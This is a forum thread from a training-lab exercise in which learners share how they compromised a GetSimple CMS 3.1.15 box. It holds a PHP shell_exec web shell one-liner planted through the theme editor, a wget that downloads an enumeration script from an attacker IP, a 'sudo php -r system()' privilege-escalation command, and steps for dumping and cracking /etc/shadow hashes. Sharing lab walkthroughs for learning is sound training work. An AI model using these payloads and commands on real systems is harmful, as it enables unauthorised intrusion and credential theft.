Getting started | Knowledge Check

Type your comment> @dewest91 said:

Type your comment> @SPARTANone17 said:

Type your comment> @dewest91 said:

Type your comment> @SPARTANone17 said:

Ok so here is one Interesting thing i got … I was able to spawn a web shell using the Following steps –
.
.
1.i was able to login as admin through the page
2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET[‘e’].’ 2>&1’); ?>
(remove the ,(commas) I had to use them or the forum was glitching)
5.then i tried the sudo -l command and it worked …(remember to url-encode spaces to run commands)
this is my progress until now…

Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

How were you able to get a true REVERSE SHELL!!! i tried like 50 times till now and still i am not able to spawn a true shell i know afterwards that i have to exploit the php vulnerablity using the gtfobins but how ? please help…

I uploaded a php web shell on the theme editor page, then setup a listener on my local machine, and used a php reverse shell one liner.

BUT were you able to navigate out of the current working Directory because last time i tried i wasn’t able to navigate out of the current working Directory. and thats not it how were you able to use the php webshell and listen onto your device…How were you able to use a Listner to A PHP webshell because a webshell can be accessed by using the Web browser or the cURL .
But i am goona try it now and Explore myself I will read your answer after i complete the module :smiley:

Type your comment> @SPARTANone17 said:

Type your comment> @dewest91 said:

Type your comment> @SPARTANone17 said:

Type your comment> @dewest91 said:

Type your comment> @SPARTANone17 said:

Ok so here is one Interesting thing i got … I was able to spawn a web shell using the Following steps –
.
.
1.i was able to login as admin through the page
2.then i started the metasploit scanned and navigated the whole System for like 3-4 Days
3.then i started googling again and found out something about GetSimple cms 3.1.15 Vulnerablity that is in theme-editor
4. I visited the theme editor and tried to edit the php files there and was able to spawn a webshell using the One liner - <,?,p,h,p, e,c,h,o, s,h,e,l,l,_e,x,e,c,($_GET[‘e’].’ 2>&1’); ?>
(remove the ,(commas) I had to use them or the forum was glitching)
5.then i tried the sudo -l command and it worked …(remember to url-encode spaces to run commands)
this is my progress until now…

Thanks, following your steps led me to the initial shell. From here though, i had to get a true reverse shell to exploit a certain binary that sudo can run on. Gtfobins led the way for me afterwards!

How were you able to get a true REVERSE SHELL!!! i tried like 50 times till now and still i am not able to spawn a true shell i know afterwards that i have to exploit the php vulnerablity using the gtfobins but how ? please help…

I uploaded a php web shell on the theme editor page, then setup a listener on my local machine, and used a php reverse shell one liner.

BUT were you able to navigate out of the current working Directory because last time i tried i wasn’t able to navigate out of the current working Directory.

Ok i was able to Get the Root flag as well … Thanks for the help @dewest91 :smile:

I wonder if anyone is able to offer a helping hand as i’m unsure as how to progress, I have managed to gain a foothold by using the Get simple msf exploit and have submitted the user flag however when trying to upload LinEnum I get the 200 OK response but then followed by permission denied?

I’m sure i’m doing something wrong (as this is the case most time) but I’m just wondering if I am missing something stupidly obvious?

Just to be clear… LinEnum.sh onto the target machine by using wget http://10.10.16.95:8080/LinEnum.sh then receive the following -

'–2021-06-28 09:56:14-- http://10.10.16.95:8080/LinEnum.sh
Connecting to 10.10.16.95:8080… connected.
HTTP request sent, awaiting response… 200 OK
Length: 46631 (46K) [text/x-sh]
LinEnum.sh: Permission denied

Cannot write to ‘LinEnum.sh’ (Permission denied).’

1 Like

So I was able to run a reverse shell via the upload command in msfconsole and curl… then… Stuck.

Yes I uploaded a linenum.sh and linpeash.sh and ran
them. Found exploits by grepping CVE in the reports… But they don’t apply.

Like there’s a sudoedit vulnerability that appears to be patched already even though the version should expose something (ran a python and a a compiled C program) but the sudoedit output indicates it was fixed.

Sudo -l … Nothing exciting

Dirty_sock/Snap-confine is shown in the report but the uploading a python exploit says it’s not vulnerable.

So round and round I go for days, trying to do this. And the kicker is, usually if you know the right answer it takes 60 seconds.

The hint points to the linpeas.sh report but I got nothing.

Oh I see now. Much simpler than I was headed.

Nevermind.

1 Like

I’ve just completed this one. The first flag (just getting a foot hold) was quite easy but the second (privilege escalation) took me a full day to figure out. I think the point was to ssh into the box as a more privileged user and get the second flag. I did that but its not actually necessary - you can get to the flag as a ‘low privilege user’ without having to ssh.

The hint for how i did it is:

  1. (You need to get a shell on the target).

  2. Look for the command available to you with sudo privileges - a comment above says linpeas/linenum does not help but it showed me exactly what i needed.

  3. Find how to call system commands (through that command as sudo) to access the restricted folders.

For fun(?) I then plundered etc/shadow, got the password hash of a user with sudo privileges, cracked it in hashcat, then ssh’ed in the target machine and got the flag. But to get to the shadow file you get the same privileges required to get the flag so its not actually necessary.

I hope that helps

3 Likes

Hello everyone, I share my experience of how I found the first file and what steps I followed;
Before all the scanning and a little research, I was able to put in a shell with metasploit, using module 1. How does it work? well this exploit creates a php file of the session created by meterpreter. So what I did was edit that file and enter the shell code, which after that allowed me to scratch and get the first file from user.txt. Now I’m going for the second flag.

You on the right way!

Could someone help me with this? I have been stuck for the past 1 week but I am just not able to log in! I believe I found the password but I kind of suspect it’s an encrypted one! I tried decrypting it but no luck! As a result, I am not able to log in and so am not able to gain the initial foothold!

Yes, It should be encrypted. You can try searching hash detecter on google and paste that key there to see what type of hash you want to decrypt and then, you can try different tools like john and hashcat to decrypt it. If you don’t know how to use them search on Internet. It’s supposed to be this way don’t worry you are on the right learning path.

Okay I got in. I tried searching around the website but the upload button doesn’t seem to be working. Is there any other way I can upload the shell ?. I tried creating a new page but that didn’t work

Hello friend, you can try accessing by metasploit then edit the session file, inside them you put your shell. Try that

hello all, direct me to the right path to get privileges, otherwise I can’t figure out how, I went to bash via metasploit, I can download and open php files, but I can’t figure out how to further increase privileges.

who is also stuck, try the command on the virtual machine: sudo php -r “system(‘$CMD’);”

1 Like

Thanks @akula993 this is what I was missing

i finished this in a very odd way but was able to get it using full msf. if you need help lmk on discord ExecPanda#2523

1 Like

do the wget from the reverse shell location you start in. cant write in home or whereever

2 Likes

This took me way to long.
Try logging in with default credentials. Very guessable.
There are plugins that are installed the can help you get in. Msfconsole can get you in as well.
You can upload files from your vm same as the previous exercise with wget.
You have to enumerate all the things.
Ask yourself how do I run the command listed in the enumeration?
That last part took me 4 hours. good luck. If you need more help than that you can reach me on discord. simulation42#4902

The first flag was pretty easy. But escalating to root could be challenging. This is how I got one foot in the door.

When you visit the site initially, you’ll notice a yellow square on the support button with an exclamation mark on it. Click on it, and it will take you to the health check page. On this page, you will see many items, including the current version of the application.
After having researched the version, I found that there is a vulnerability in the theme-edit.php page, where an attacker may be able to upload arbitrary code to gain remote access to the host. Having made this discovery, I quickly referenced my already working solutions of reverse-php shells, and copy and pasted the code into the theme-edit.php file and/or page. Once the file was saved, did I have to start a netcat listener on the port configured in my reverse shell and curl the webpage where the theme template was saved.
For working reverse shells, you may go to pentestmonkey.net.

I hope this helps.
Happy hacking!

1 Like

I was able to obtain the root flag.

I did so by downloading linpeas.sh and also exploit-suggester.py. The latter worked perfect but you can make your choice.In researching the first found CVE for the kernel version, I found a local privilege escalation vulnerability in polkit pkexec tool by means of memory corruption. It allows an unprivileged user to gain full root privileges.

I hope this helps.
Happy hacking!